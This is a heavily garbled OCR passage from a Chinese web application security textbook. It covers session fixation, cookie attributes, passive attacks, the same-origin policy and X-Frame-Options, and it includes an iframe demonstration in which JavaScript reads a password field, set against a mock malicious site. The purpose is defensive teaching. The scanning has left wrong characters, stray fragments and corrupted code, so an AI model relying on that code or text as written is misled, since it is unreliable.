顾客 : 受理 编号 为 9466ir8fgmmk1gn6raeo7ne71。 卡 号 为 12345， 密 码 为 9876， 请 确认 。 








0 9098 09: 











柜员 : 身份 核实 完毕 
行 完 身份 确认 后 恶人 也 走向 了 柜台 。 
恶人 : 受理 编号 为 9466ir8fgmmk1gn6raeo7ne71。 请 向 卡号 99999 的 账户 转账 3 万 元 。 








mr 
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像 这 样 ， 亚 人 (攻击 者 ) 劫持 正规 用 户 的 会 话 ID 来 进行 攻击 的 手法 被 称 为 会 话 固 定 攻 击 
(Session Fixation Attack )。 详 情 将 在 4.6.4 节 中 讲述 ， 这 里 我 们 可 以 先 尝 试 修复 此 安全 隐患 。 从 客 
人 进入 银行 开始 。 














进入 银行 时 ， 有 恶人 冒充 银行 柜员 向 顾客 搭 话 。 
恶人 ; 您 的 受理 编号 为 9466ir8fgmmk1gn6raeo7ne71。 
顾客 : 知道 了 。 
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日 
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顾客 : 我 的 受理 编号 为 9466ir8fgmmk1gn6raeo7ne71。 
柜员 : 请 提 供 您 的 银 和 行 卡号 和 密 人 码 。 


容 ; 受理 编号 为 9466ir8fgmmk1gn6raeo7ne71。 卡 号 为 12345， 密 码 为 9876， 请 确认 。 

















Ss 
[U 





员 : 身份 核实 完毕 。 您 新 的 受理 编号 为 eut1j15a058pm8gapa87I937h6。 
完 本 人 身份 确认 后 恶人 也 走向 了 柜台 。 
: 受理 编号 为 9466ir8fgmmk1gn6raeo7ne71。 请 向 卡号 99999 的 账户 转账 3 万 元 。 
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: 您 还 没有 进行 身份 核实 。 请 提供 您 的 银行 卡号 和 密码 。 
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由 于 顾客 通过 认证 时 受理 编号 (会 话 ID ) 发 生 了 变化 ， 所 以 攻击 者 试图 使 用 原来 的 受理 编 
号 进行 转账 时 就 遭 到 了 “您 还 没有 进行 身份 核实 ”的 提示 。 通 过 这 个 方法 ， 可 有 效 防 止 会 话 固 
定 攻 击 。 












































要 点 ”认证 后 改变 会 话 ID。 
下 面 让 我 们 继续 看 一 下 需求 3 的 防止 会 话 ID 泄漏 。 


令 会 话 ID 泄漏 的 原因 
会 话 ID 一旦 遭 到 泄漏 就 有 可 能 发 生 伪装 事件 ， 所 以 必须 采取 防范 措施 。 会 话 ID 泄漏 主要 

有 以 下 几 种 原因 。 

发 行 Cookie 时 的 属性 指定 有 问题 ( 稍 后 讲述 ) 

会 话 ID 在 网 络 上 被 监听 (参考 7.3 节 ) 
通过 跨 站 脚本 漏洞 等 应 用 中 的 安全 隐患 被 泄漏 (参考 第 4 章 ) 
由 于 PHP 或 浏览 器 等 平台 存在 安全 隐患 而 被 泄漏 
会 话 ID 保存 在 URL 中 的 情况 下 ， 会 通过 Referer 消息 头 泄漏 (参考 4.6.3 节 ) 


网 络 传输 线路 上 车 存 在 监听 装置 ,会话 ID 就 有 被 窃取 的 风险 。 虽 然 从 外 部 无 法 得 知 具 体 哪 
里 会 有 监听 装置 ， 但 在 公共 无 线 网 等 理论 上 易于 监听 的 环境 中 ,会 话 ID 被 盗 的 风险 是 非常 高 的 。 

为 了 保护 会 话 ID 不 被 监听 ,采用 SSL ( Secure Socket Layer ) 加 密 是 行 之 有 效 的 方法 ， 但 发 
行 Cookie 时 也 需要 注意 属性 的 指定 。 





























令 Cookie 的 属性 
生成 Cookie 时 可 以 设置 很 多 属性 。 先 前 看 到 的 PHPSESSID 在 生成 时 指定 了 “path=/”， 这 
就 是 一 个 属性 。 


生成 Cookie 时 的 主要 属性 如 表 3-3 所 示 。 
表 3-3 ”Cookie 的 属性 

































































属性 含义 
Domain Cookie 发 送 对 象 服务 器 的 域名 
Path Cookie 发 送 对 象 URL 的 路 径 
Expires Cookie 的 有 效 期 限 。 未 指定 则 表示 至 浏览 器 关闭 为 止 
Secure 仅 在 SSL 加 密 的 情况 下 发 送 Cookie 
HttpOnly 和 定 了 此 属性 的 Cookie 不 能 被 JavaScript 访问 

















其 中 ,涉及 安全 性 的 3 个 重要 属性 为 Domain 、Secure、HttpOnly。 


CO Cookie 的 Domain 属性 
Cookie 在 默认 情况 下 只 能 被 发 送 到 与 其 绑 定 的 服务 器 。 虽 然 从 安全 性 方面 考虑 这 样 是 最 安 
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全 的 , 但 有 时 也 需要 能 向 多 个 服务 器 发 送 的 Cookie， 这 时 就 要 用 到 Domain 属性 。 

图 3-21 展示 了 指定 Domain 属性 后 的 Cookie 被 发 送 给 服务 器 的 情况 。 由 于 指定 了 
Domain=example.jp， 因 此 ，Cookie 就 被 发 送 给 了 a.example.jp 和 b.example.jp， 而 a.example.com 
则 因为 域名 不 同 而 没有 发 送 。 

| a.example.jp 


图 3-21 指定 Cookie 的 Domain 属性 
O _ [e| 


Set -Cookie: x=123; Domain=example.jp 
O | b.example.jp 





a.example.com 
〇 Cookie 被 发 送 xX | 
X Cookie 不 被 发 送 Le 











假如 a.example.jp 的 服务 需 在 Set-Cookie 时 指定 了 Domain=example.com， 此 Cookie 就 会 被 
浏览 器 忽略 。 这 是 因为 如 果 可 以 在 Cookie 中 指定 不 同 域名 ， 就 可 能 发 生前 述 的 会 话 固定 攻击 ， 
所 以 Cookie 是 不 能 指定 不 同 域名 的 。 

未 指定 Domain 属性 时 ，Cookie 只 被 发 送 至 生成 它 的 服务 器 。 换 言 之 , 未 指定 Domain 属性 
的 Cookie 发 送 范围 最 小 ， 最 安全 。 而 设置 Domain 属性 时 稍 有 玻 忽 ， 就 会 产生 安全 隐患 。 

举例 来 说 ， 假 设 example.com 是 服务 需 租 赁 商 ，foo.example.com 和 bar.example.com 
都 是 托管 在 此 租赁 服务 器 上 的 网 站 。 如 果 foo.example.com 网 站 发 送 的 Cookie 中 指定 了 
Domain=example.com， 此 Cookie 就 会 被 洒 漏 至 bar.example.com。 

由 此 可 见 ， 不 设置 Cookie 的 Domain 属性 是 最 佳 实践 。 









































要 点 ”原则 上 不 设置 Cookie 的 Domain 属性 
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专栏 : Cookie Monster Bug COLUMN 




















笔者 所 在 公司 的 网 站 域名 是 hash-c.co.jp， 生 成 的 Cookie 中 指定 的 域名 最 短 也 应 当 为 hash-c. 
co.jp。 但 是 ， 使 用 一 些 旧 版 本 浏览 器 时 Cookie 的 域名 却 被 指定 成 了 .co.jp。 这 一 问题 就 被 称 为 
“Cookie Monster Bug 。 
使 用 存在 Cookie Monster Bug 的 浏览 器 会 极 易 遭 受 会 话 固定 攻击 。 因 为 域名 为 .co.jp 的 
Cookie 也 能 匹配 amazon.co.jp 和 yahoo.co.jp 等 其 他 .co.jp 的 域名 ， 这 就 意味 着 能 够 对 这 些 网 站 
任意 指定 Cookie。 

在 Internet Explorer 8 ( IE8 ) 中 使 用 地 域 型 域名 时 也 存在 Cookie Monster Bug。 举 例 来 
说 ， 笔 者 所 住 的 横滨 市 的 域名 为 city.yokohama.jp， 而 横滨 市 内 的 地 方 政府 或 企业 、 团 体 、 个 人 
等 也 都 能 够 获得 以 yokohama.jp 结尾 的 域名 。 也 就 是 说 笔者 能 够 申请 获得 tokumaru.kanazawa. 
yokohama.jp 这 个 域名 ( kanazawa 为 横滨 市 金 汉 区 )。 问 题 是 ， 使 用 Internet Explorer 时 ， 网 站 
tokumaru.kanazawa.yokohama.jp 能 够 生成 域名 为 yokohama.jp 的 Cookie。 
地 域 型 域名 在 地 方 政府 的 网 站 中 有 着 广泛 的 应 用 ， 却 容易 遭 到 会 话 固定 攻击 。 最 近 ，. 1g.jp 
作为 地 方 政府 的 域名 开始 被 使 用 ， 横 滨 市 也 启用 了 city.yokohama.lg.jp 域名 。 因 此 ， 建 议 使 用 地 
域 型 域名 的 网 站 ， 在 加 强 防 范 会 话 固定 攻击 的 同时 ， 也 不 妨 考虑 一 下 迁移 至 其 他 形式 的 域名 。 






















































































































































































































































































人 Cookie 的 安全 属性 

设置 了 Secure 属性 (下 述 为 安全 属性 ) 的 Cookie 仅 在 SSL 传输 的 情况 下 能 够 被 发 送 给 服务 
器 。 而 未 设置 安全 属性 的 Cookie 则 无 关 是 否 为 SSL 传输 ， 都 会 被 发 送 。 

指定 Cookie 的 安全 属性 是 为 了 确保 Cookie 在 SSL 的 情况 下 发 送 。 详 情 请 参考 4.8.2 节 。 
































CO Cookie 的 HttpOnly 属性 

设置 了 HttpOnly 属性 后 ，JavaScript 就 不 能 访问 该 Cookie 了 。 

恶意 使 用 JavaScript 进行 跨 站 脚本 攻击 从 而 取得 Cookie 信息 ， 是 窃取 Cookie 中 会 话 ID 的 典 
型 案例 。 而 Cookie 中 设置 了 HttpOnly 属性 后 ， 就 能 防止 JavaScript 窃取 Cookie 信息 。 

后 面 专门 讲述 跨 站 脚本 时 也 会 提 到 ， 其 实 设置 了 HttpOnly 属性 也 无 法 彻底 抵御 跨 站 脚本 攻 
击 , 但 是 能 加 大 攻击 的 难度 。 而 设置 HttpOnly 属性 通常 不 会 带 来 坏处 ， 所 以 应 当时 常 给 Cookie 
加 上 HttpOnly 属性 。 

使 用 PHP 的 情况 下 ， 给 Cookie 添加 HttpOnly 属性 ， 只 要 在 php.ini 中 添加 如 下 设置 即 可 。 























dal 












































session.cookie httponly = on 











关于 Cookie 的 HttpOnly 属性 ， 在 讲 跨 站 脚本 漏洞 的 防范 对 策 时 还 会 再 次 提 到 。 
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总 结 


为 了 有 助 于 理解 Web 应 用 的 安全 隐患 ， 本 节 讲 述 了 HITP、Basic 认证 、Cookie、 会 话 管理 
的 相关 知识 。 当 前 大 多 数 应 用 都 采用 Cookie 来 进行 会 话 管理 ， 这 在 认证 结果 的 保存 等 安全 性 方 
面 扮演 着 重要 角色 。 

作为 本 节 的 应 用 篇 ， 下 节 将 讲述 被 动 攻 击 和 同 源 策略 。 
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3.2 被动 攻击 与 同 源 策略 


本 节 首 先 讲述 被 动 攻 击 这 一 攻击 手法 ， 然 后 介绍 浏览 融 针 对 此 类 攻击 的 防御 策略 一 一 沙 盒 。 
沙 盒 技术 的 核心 概念 为 “ 同 源 策 略 ”， 它 对 于 理解 Web 应 用 的 安全 隐患 至 关 重 要 , 所 以 ， 对 同 源 
策略 这 一 概念 ， 本 节 也 会 进行 详细 说 明 。 








主动 攻击 与 被 动 攻 击 
针对 Web 应 用 程序 的 攻击 可 分 为 主动 攻击 ( Active Attack ) 和 被 动 攻 击 ( Passive Attack )。 下 
面 先 简单 介绍 这 两 者 的 区 别 ， 然 后 再 重点 讲述 被 动 攻 击 。 


令 主 动 攻 击 
所 谓 主 动 攻击 ， 是 指 攻 击 者 直接 攻击 Web 服务 器 。SQL 注入 攻击 即 是 主动 攻击 的 代表 性 例 
子 ( 图 3-22 )。 


图 3-22 主动 攻击 
标 网 站 
和 = * 信息 泄漏 


令 被 动 攻击 
被 动 攻击 是 指 ， 攻 击 者 并 不 直接 攻击 服务 器 ， 而 是 针对 网 站 的 用 户 设 下 陷阱 ， 利 用 掉 入 陷阱 
的 用 户 来 攻击 应 用 程序 。 下 面 ， 让 我 们 按照 由 易 到 难 的 顺序 来 依次 解说 被 动 攻 击 的 3 种 模式 。 















































今 单纯 的 被 动 攻 击 
将 用 户 诱导 至 设 有 圈套 的 网 站 ， 就 是 一 种 单纯 的 被 动 攻 击 模 式 。 图 3-23 描绘 了 此 类 攻击 的 


流程 。 

















图 3-23 单纯 的 被 动 攻 击 





恶意 网 站 
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此 类 攻击 的 典型 案例 为 ,用户 在 浏览 过 所 谓 的 “可 疑 网 站 ”之 后 会 感染 上 恶意 软件 (病毒 
等 )。 理 论 上 如 果 浏 览 絮 (包括 Adobe Flash Player 等 插件 ) 不 存在 漏洞 ， 此 类 单纯 的 被 动 攻 击 是 
行 不 通 的 。 但 现实 中 ， 针 对 浏览 器 以 及 Adobe Reader、Adobe Flash Player、JRE 等 插件 的 漏洞 进 
行 的 攻击 却 层出不穷 。 




















多 恶意 利用 正规 网 站 进行 的 被 动 攻击 
下 面 介 绍 一 种 稍微 复杂 一 些 的 被 动 攻击 模式 ， 即 通过 在 正规 网 站 设置 陷阱 来 实施 攻击 。 这 也 
是 一 种 屡见不鲜 的 模式 。 图 3-24 描绘 了 此 类 攻击 的 流程 。 


图 3-24 在 正规 网 站 中 设置 陷阱 的 被 动 攻击 




















@) 恶 意 HTML 上 


正规 网 站 

攻击 者 事先 人 侵 正 规 网 站 ， 往 其 内 容 中 乱入 恶意 代码 (CD )。 网 站 用 户 在 浏览 了 含有 恶意 代 
码 的 内 容 后 ( 包 一 名 )， 就 会 感染 病毒 (也 )。 在 这 一 流程 中 ， 单 看 步骤 中 的 话 似乎 应 归 类 为 主动 
攻击 ， 但 步骤 @ 一 由 均 为 被 动 攻击 ， 因 此 ， 可 将 中 视 作 被 劲 攻击 的 前 期 准备 。 

通过 恶意 利用 正规 网 站 进行 被 动 攻击 ， 与 自己 准备 一 个 恶意 网 站 这 种 单纯 的 攻击 模式 相 比 要 
费事 得 多 , 但 男 一 方面 ， 这 种 方式 对 于 攻击 者 来 说 可 以 说 是 利 大 于 素 ， 原因 如 下 。 


不 需要 专门 将 用 户 诱导 至 恶意 网 站 
正规 网 站 的 用 户 数量 庞大 ， 因 此 能 提高 增加 受害 者 的 可 能 性 
攻击 者 能 入 侵 正规 网 站 ， 非 正当 地 使 用 其 功能 ， 并 从 中 受益 
攻击 者 能 通过 窃取 网 站 用 户 的 个 人 信息 而 受益 

在 正规 网 站 中 设置 陷阱 的 手法 通常 有 下 列 4 种 。 


非法 获取 FTP 等 服务 器 的 密码 后 算 改 网 站 内 容 (参考 7.1 节 ) 

通过 攻击 Web 服务 器 的 安全 隐患 来 自 改 网 站 内 容 (参考 7.1 节 ) 

通过 SQL 注入 攻击 来 算 改 网 站 内 容 (参考 4.4 节 ) 

在 社交 网 络 这 类 用 户 能 够 自己 发 布 内 容 的 网 站 上 ， 利 用 跨 站 脚本 漏洞 实施 攻击 ( 参考 
4.3 节 ) 


2010 年 初 爆发 的 恶意 程序 Gumblar 就 属于 此 类 模式 的 被 动 攻击 。 另 外 ，2008 年 以 来 数量 急 
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剧 增加 的 SQL 注入 攻击 ， 也 被 频繁 地 用 于 此 类 攻击 。 而 无 论 哪 种 方法 ， 在 第 1 章 介绍 的 僵尸 网 
络 的 构建 过 程 中 ， 都 会 被 恶意 使 用 。 


令 跨 站 被 动 攻击 
最 后 ， 让 我 们 看 一 下 同时 使 用 恶意 网 站 和 正规 网 站 的 被 动 攻击 模式 。 攻 击 流程 见 图 3-25。 


3-25 ” 跨 站 被 动 攻 击 


一 


恶意 网 站 
(3) 攻 击 用 请 求 


包含 恶意 代码 的 响应 












正规 网 站 





非法 操作 
[esi 动 





接 下 来 ， 让 我 们 根据 上 图 来 看 一 下 跨 站 被 动 攻 击 的 具体 流程 。 


Q 用 户 浏览 恶意 网 站 

@ 从 恶意 网 站 下 载 含 有 恶意 代码 的 HIMLY 

G@) HTML 中 的 恶意 代码 被 触发 ， 从 而 向 正规 网 站 发 送 攻击 请 求 
正规 网 站 返回 含有 JavaScript 等 的 响应 内 容 


有 些 情况 下 步骤 @ 会 被 省 略 。 

此 类 攻击 的 特征 为 ， 恶 意 利用 已 经 在 正规 网 站 登录 的 用 户 账号 来 实施 攻击 。 由 于 步 又 @) 的 请 
求 中 要 向 正规 网 站 发 送 会 话 Cookie， 因 此 ， 如 果 用 户 已 经 在 正规 网 站 登录 ， 就 会 利用 其 已 经 登录 
的 状态 实施 攻击 。 

此 类 攻击 模式 的 典型 案例 包括 ， 在 步骤 @ 的 请 求 中 对 Web 应 用 发 动 攻击 的 跨 站 请 求 伪造 
(CCSRF， 参 考 4.5 节 )， 以 及 在 步 又 由 的 响应 中 利用 浏览 器 来 执行 攻击 的 跨 站 脚本 攻击 (XSS， 参 
考 43 节 ) 和 HITP 消息 头 注 入 攻击 (参考 4.7 节 ) 























浏览 器 如 何 防 御 被 动 攻 击 

针对 以 上 被 动 攻击 ， 浏 览 器 和 网 站 都 需要 采取 相应 的 防御 措施 。 本 书 将 从 第 4 章 开始 详 述 网 
站 方面 的 对 策 ， 但 其 前 提 是 浏览 器 不 存在 安全 方面 的 问题 。 如 果 浏 览 器 存在 安全 问题 ， 网 站 方面 
即使 实施 了 对 策 也 无 法 完全 确保 安全 性 。 








@ 含有 恶意 代码 的 HTML， 多 是 指 在 网 络 论坛 上 发 布 的 专门 用 来 攻击 的 URL。 
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在 说 明 网 站 的 对 策 之 前 ， 让 我 们 先 来 关注 一 下 浏览 如 的 安全 功能 。 


SJ 全 
令 沙 盒 


浏览 器 能 够 在 用 户 浏览 网 站 的 同时 运行 一 些 程序 ， 比 如 JavaScript、Java Applet、Adobe 
Flash Player、ActiveX 等 。 而 为 了 防止 恶意 程序 在 用 户 的 浏览 器 上 运行 ，JavaScript 等 语言 提供 了 
一 些 增强 安全 性 的 机 能 。 基 本 思想 有 如 下 两 种 。 
只 有 在 用 户 确认 了 程序 的 发 行 方 并 且 允 许 运行 的 情况 下 ， 程 序 才能 被 运行 
提供 限制 程序 权限 的 沙 盒 环 境 
第 一 种 方式 经 常 被 用 于 ActiveX 或 带 有 签名 的 Applet， 但 如 果 一 般 的 应 用 程序 都 采用 这 种 方 
式 的 话 ， 对 用 户 来 说 就 显得 负担 过 大 ， 因 此 ， 现 在 这 种 方式 主要 用 于 为 浏览 需 提 供 插件 功能 。 
沙 盒 ( Sandbox )， 是 JavaScript、Java Applet、Adobe Flash Player 等 经 常 使 用 的 一 种 思路 。 
在 沙 盒 里 面 ， 程 序 的 权限 受到 制约 ， 即 使 编写 了 恶意 程序 也 无 法 对 用 户 造成 伤害 。 就 像 孩子 们 和 角 
在 沙 地 中 尽情 地 唾 闹 而 不 会 给 外 界 带 来 困扰 一 样 ， 由 此 便 使 用 了 英语 “sandbox” 一 词 ， 并 将 其 
引申 为 “ 沙 盒 ”。 
通常 情况 下 ， 沙 盒 限 制 了 以 下 功能 。 
禁止 访问 本 地 文件 
禁止 使 用 打印 机 等 资源 ( 可 以 显示 页 面 ) 
限制 网 络 访问 〈 同 源 策略 ) 


虽然 网 络 访问 无 法 被 完全 禁止 ， 但 却 受 到 了 严格 的 限制 ， 此 限制 就 被 称 为 同 源 策 略 。 下 面 ， 
让 我 们 一 起 看 一 下 JavaScript 中 的 同 源 策略 。 
























































令 同 源 策略 

同 源 策略 ( Same Origin Policy ) 是 禁止 JavaScript 进行 跨 站 访问 的 安全 策略 。 它 也 是 浏览 
的 沙 盒 环境 所 提供 的 一 项 制约 。 

浏览 器 可 以 同时 处 理 多 个 网 站 的 内 容 ， 其 典型 方法 为 使 用 标签 页 或 frame 等 。 下 面 ， 我们 以 
iframe 为 例 来 说 明 同 源 策略 的 必要 性 。 









































OO JavaScript 访问 iframe 的 试验 

接 下 来 ， 让 我 们 通过 观察 JavaScript 对 iframe 的 访问 限制 来 体验 同 源 策略 。 首 先 ， 有 一 点 需 
要 了 解 到 的 是 ， 如 果 主 机 ( Host ) 相同 ， 在 iframe 的 外 部 就 能 够 通过 JavaScript 取得 iframe 内 部 
的 HTML 内 容 。 

下 面 展示 的 是 包含 iframe 要 素 的 “外 层 ”HTMLY。 























四 32-001.html 含有 XSS 漏洞 。 详 情 参 考 4.3 节 。 
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代码 清单 “/32/32-001.html ( 外 层 HTML ) 








<html> 
<head><title> 跨 frame 的 读 取 试验 </title></head> 
<body> 在 iframe 中 显示 其 他 HTML 的 内 容 


<iframe name="iframel" width="300" height="80" src="http://example.jp/32/32-002. 
Wem > 


</iframe><br> 

<input type="button" onclick="go()" value=" 密码 一 "> 

<script> 

function go() { pp ee 
Ei 三 一 一 取得 iframe 中 的 内 容 





var x = 1Iframel.Qocument .forml.passwd.value; 

document .getElementById('out').innerHTML = x; 在 DOM 中 显示 读 取出 的 字符 串 
} catch (e) { 

alert (e.message); 

} 
} 


</ GEL 人 E> 











<span id="out"></span> 
</body> 
</html> 











下 面 是 显示 在 iframe 中 的 “内 层 ”HTML。 


代码 清单 “/32/32-002.html ( 内 层 HTML ) 





<body> 
<form name="forml"> 
iframe 的 内 层 <br> 


密码 <input type="text" name="passwd" value="password1"> 





</form> 
</body> 














运行 页 面 如 图 3-26 所 示 。 点 击 “ 密 码 一 ”按钮 后 ，iframe 内 部 的 文本 框 中 的 文字 出 现在 了 
按钮 右 侧 。 由 此 证 实 了 JavaScript 能 够 取得 iframe 内 部 的 内 容 。 


3-26 JavaScript 能 够 读 取 iframe 内 部 数据 


























并 y Ee 
大 计 frame 读 吧 二 闪 - Windows Internet Explorer [Ex 大 时 frame 访 双 汪 对 - Windows Intermet Explorer IEISEZR 
OO 三 | 回 htpy/examplejp/32/32-00Lht [|x || sing P OO = | htpy/examplejp/32/32-00Lht ~ | | x || sing pr 

次 向 天 | 看 时 frame 读 取 江 验 | 工 RO ~ 帘 收 项 夫 。 | 知 踪 frame 读 取 坛 给 IRO 


























WWame 的 内 部 ame 的 内 部 一 ~ 
密码 password1 密码 password1 i 
读 取 成 功 
password1 
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CO iframe 被 恶 用 的 可 能 性 

iframe 内 部 的 信息 能 被 JavaScript 读 取 ， 这 样 会 不 会 有 安全 性 问题 呢 ? 

现在 假设 你 是 被 动 攻 击 的 受害 者 。 在 example.jp 登录 以 后 ,浏览 了 恶意 网 站 trap.example.com。 
恶意 网 站 使 用 iframe 来 显示 example.jp 的 内 容 ， 如 图 3-27 所 示 。 由 于 你 已 经 登录 了 example.jp， 
所 以 iframe 内 会 显示 你 的 个 人 信息 ， 但 这 些 信息 只 有 你 自己 看 到 ， 所 以 显示 在 浏览 器 上 本 身 不 存 
在 问题 。 


图 3-27 使 用 iframe 的 恶意 网 站 














恶意 服务 器 


trap.example.com 


溃 
恶意 网 站 
JavaScrip 中 D7 巾 


















































会 话 Cookie 匡 
一 攻击 目标 服务 器 
example.jp 
内 容 
( 包含 敏感 信息 ) 富 ) 











但 是 ， 假 如 恶意 网 站 能 用 JavaScript 访问 iframe 内 部 信息 的 话 就 存在 问题 了 。 因 为 你 的 个 人 
信息 会 被 恶意 网 站 上 的 脚本 发 送 给 它 的 服务 器 。 下 面 我 们 来 试验 一 下 这 是 否 可 行 。 

这 次 充当 恶意 网 站 的 是 包含 iframe 的 HTML (32-900.html )， 假 设 它 被 托管 于 trap.example.com， 
并 在 其 iframe 中 显示 刚才 的 32-002.html (内 侧 HTML )。32-900.html 虽然 扮演 恶意 网 站 的 角色 ， 
但 其 内 容 同 32-001.html 一 样 。 











今 同 源 策略 
访问 http://trap.example.com/32/32-900.html 后 点 击 “ 密 码 一 ”按钮 ， 页 面 显示 如 下 。 


图 3-28 ”恶意 网 站 试图 使 用 JavaScript 读 取 iframe 内 部 内 容 被 拒绝 

















大 -| 
看 跨 iframe 读 到 试验 - Windows Internet Explorer 写 | 名 | 
OO [8 htp//rap.examplecom/32/32-900html + [>|x|[S ing pr 

次 收 茂 夫 。 | 税 中 frame 读 取 试 验 | | 工具 (oO) ~ 








过 ame 的 内 部 来 自 网 页 的 湛 息 








密码 password1 


人 A Ce 
FT 入 拒绝 访问 。 
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虽然 iframe 内 可 以 显示 example.jp 的 内 容 ， 但 是 其 他 主机 (trap.example.com ) 上 的 JavaScript 
却 无 法 访问 其 内 容 。 这 是 因为 JavaScript 若 能 访问 其 他 主机 的 话 就 会 导致 安全 性 问题 ， 所 以 根据 
同 源 策略 ， 访 问 遭 到 了 拒绝 。 























仿 同 源 的 条 件 
目前 为 止 一 直 使 用 着 “相同 主机 ”这 个 含糊 的 用 语 ， 而 严格 来 说 ,“ 同 源 ” 需 满足 以 下 全 部 
条 件 。 
URL 的 主机 (FQDN : Fully Qualified Domain Name， 全 称 域名 ) 一 致 2 
Scheme (协议 ) 一 致 
端口 号 一 至 


发 送 Cookie 时 的 条 件 与 协议 或 端口 号 无 关 ， 所 以 针对 JavaSeript 的 限制 正 变 得 越发 严格 。 而 
另 一 方面 ，JavaScript 却 没有 访问 目录 的 限制 ”。 

同 源 策略 的 保护 对 象 不 仅仅 是 iframe 内 的 文档 。 比 如 ， 实 现 Ajax 时 所 使 用 的 XMLHttpRequest 
对 象 能 够 访问 的 URL 也 受到 了 同 源 策略 的 限制 。 


令 应 用 程序 安全 隐患 与 被 动 攻 击 

虽然 浏览 器 的 同 源 策 略为 抵御 被 动 攻击 设 下 了 一 道 屏 障 ， 但 如 果 应 用 程序 中 存在 安全 隐患 ， 
是 有 可 能 会 遭受 到 被 动 攻击 。 跨 站 脚本 攻击 ( XSS ) 就 是 典型 的 例子 。 

跨 站 脚本 攻击 在 下 一 章 中 会 详细 讲述 ， 这 里 ， 我 们 先 利用 刚才 试验 的 例子 来 解释 一 下 其 攻击 
方式 。 在 使 用 iframe 外 层 的 JavaScript 访问 内 层 ( 其 他 主机 ) 数据 时 由 于 违反 同 源 策 略 ， 访 问 会 
被 拒绝 。 但 是 ， 这 种 情况 下 却 可 以 使 用 一 些 特殊 手段 将 JavaScript 放 到 iframe 的 内 层 去 执行 。 由 
于 在 iframe 内 层 不 会 受到 同 源 策略 的 限制 ， 因 此 就 能 够 成 功 访问 文档 信息 。 这 种 攻击 就 叫 作 跨 
站 脚本 攻击 (XSS ) %。XSS 将 在 4.3 节 详 细 讲 述 。 









































Si 









































中 ”主机 方面 ， 通 过 JavaScript 修改 document.domain 可 以 使 条 件 放宽 ， 但 至 少 也 被 限制 在 了 相同 域名 中 不 同 主机 之 间 的 
访问 。 

@ i-mode2.0 (日 本 NTT DoCoMo ) 的 手机 浏览 器 的 同 源 策 略 中 添加 了 目录 访问 的 限制 。 

@) 这 里 所 讲解 的 是 使 用 iframe 来 进行 XSS 攻击 的 情况 ， 但 其 实 不 用 iframe 也 同样 能 发 动 XSS 攻击 。 
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图 3-29 XSS 通过 将 JavaScript 放 到 内 层 从 而 在 同 源 的 环境 下 来 执行 


trap.example.com 
中 恶意 网 站 返回 的 响应 信息 


SL 


l examplejp 

















恶意 网 站 
将 JavaScript 送 入 


人) 请 求 内 容 
会 话 Cookie 


执行 JavaScript 














专栏 : 第 三 方 JavaScript 





COLUMN 















































虽然 XSS 是 因 不 怀 好 意 的 第 三 方 执行 JavaScript 而 产生 的 问题 ， 但 有 些 情 况 下 我 们 也 会 需 


























要 执行 第 三 方 JavaScript。 而 为 了 安全 上 的 考虑 ， 网 站 运营 者 或 者 网 页 浏览 者 通常 执行 的 是 他 们 





信和 他 的 Synyavasenpte 


令 网 站 运营 者 执行 所 信任 的 第 三 方 JavaScript 





















































网 站 运营 者 有 时 会 将 第 三 方 JavaScript 瞬 入 到 自己 的 网 站 中 。 典 型 的 例子 为 ， 访 问 解析 、 横 


幅 广告 、 博 客 插件 等 。 这 种 情况 下 ， 运 营 者 会 有 意 将 第 三 方 的 JavaScript 垦 入 到 网 页 中 。 






































腾 入 的 JavaScript 如 果 是 恶意 代码 ， 网 站 就 有 信息 泄漏 或 遭 到 笑 改 的 风险 。 所 以 ，JavaScript 























提供 方 值得 信赖 当 属 前 提 条 件 。 但 是 ， 基 于 以 下 种 种 威胁 ， 现 实 中 安全 问题 却 屡屡 发 生 。 
































提供 方 有 意 收集 个 人 信息 
提供 方 的 服务 器 存在 安全 隐患 ，JavaScript 代码 被 调包 
提供 方 的 JavaScript 代码 存在 安全 隐患 而 被 迫 运 行 其 他 脚本 

















oH 






































网 站 横幅 广告 用 的 JavaScript 和 XSS 用 的 JavaScript, 从 技术 角度 来 看 其 危险 程度 是 相同 的 。 



































AAA -一 











两 者 的 区 别 仅 是 网 站 运营 者 对 提供 方 信赖 与 否 的 问题 。 因 此 ， 即 使 有 意 嵌 入 
也 需要 在 充分 调查 提供 方 信赖 度 的 基础 上 ， 慎 重 作出 判断 。 


多 网 页 浏览 者 信任 第 三 方 而 向 网 页 中 散 入 JavaScript 





















































第 三 方 WaVaSaripi 


Firefox 的 插件 Greasemonkey， 就 是 网 页 浏览 者 信任 第 三 方 而 向 网 页 中 嵌入 JavaScript 的 
例子 。Greasemonkey 能 让 用 户 通 过 安装 各 种 脚本 从 而 轻易 改变 浏览 中 的 网 页 内 容 。 
Greasemonkey 运行 时 通常 比 JavaScript 拥有 更 强 的 权限 ， 所 以 ， 假 如 Greasemonkey 脚 





















































本 的 作者 心怀 不 轨 ， 就 能 够 进行 盗 取 密码 等 非法 操作 。 
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JavaScript 以 外 的 跨 域 访问 
前 面 讲 解 了 JavaScript 的 跨 域 访问 会 受到 同 源 策略 的 严格 限制 。 ， 让 我 们 来 看 一 些 能 够 
进行 跨 域 访问 的 其 他 浏览 器 功能 。 








令 frame 元素 与 frame 元 素 
通过 前 面 的 试验 可 知 ，iframe 元 素 与 frame 元 素 能 够 进行 跨 域 访问 ， 但 通过 JavaScript 却 不 
能 跨 域 访 问 iframe 中 的 文档 内 容 。 























专栏 : X-FRAME-OPTIONS 











X-FRAME-OPTIONS 是 微软 公司 提出 的 一 种 限制 fame 和 iframe 访问 权限 的 方案 ， 现 已 被 |E、 
Firefox、Google Chrome、Safari、Opera 等 主流 浏览 器 的 最 新 版 采用 。 
X-FRAME-OPTIONS 被 定义 在 响应 头 信 息 中 ， 值 为 DENY ( 拒绝 ) 或 SAMEORIGIN ( 仅 限 
原 )。 指 定 了 DENY 的 响应 将 不 能 显示 在 frame 等 的 内 层 中 ， 而 SAMEORIGIN 的 情况 下 则 仅 
当 与 地 址 栏 上 显示 的 域名 为 同 源 时 才能 够 被 显示 。 
在 PHP 中 将 X-FRAME-OPTIONS 指定 为 SAMEORIGIN 的 方法 如 下 。 































































































header ('X-FRAME-OPTIONS: SAMEORIGIN'); 
































X-FRAME-OPTIONS 还 可 以 用 来 防范 点 击 劫持 ( Clickjacking ) *。 通 过 将 不 使 用 frame 或 frame 
的 网 站 指定 为 DENY, 使 用 frame 并 且 使 用 单一 主机 的 网 站 指定 为 SAMEORIGIN, 就 能 够 更 好 地 防御 
利用 frame 执行 的 各 种 攻击 。 






















































































令 img 元 素 
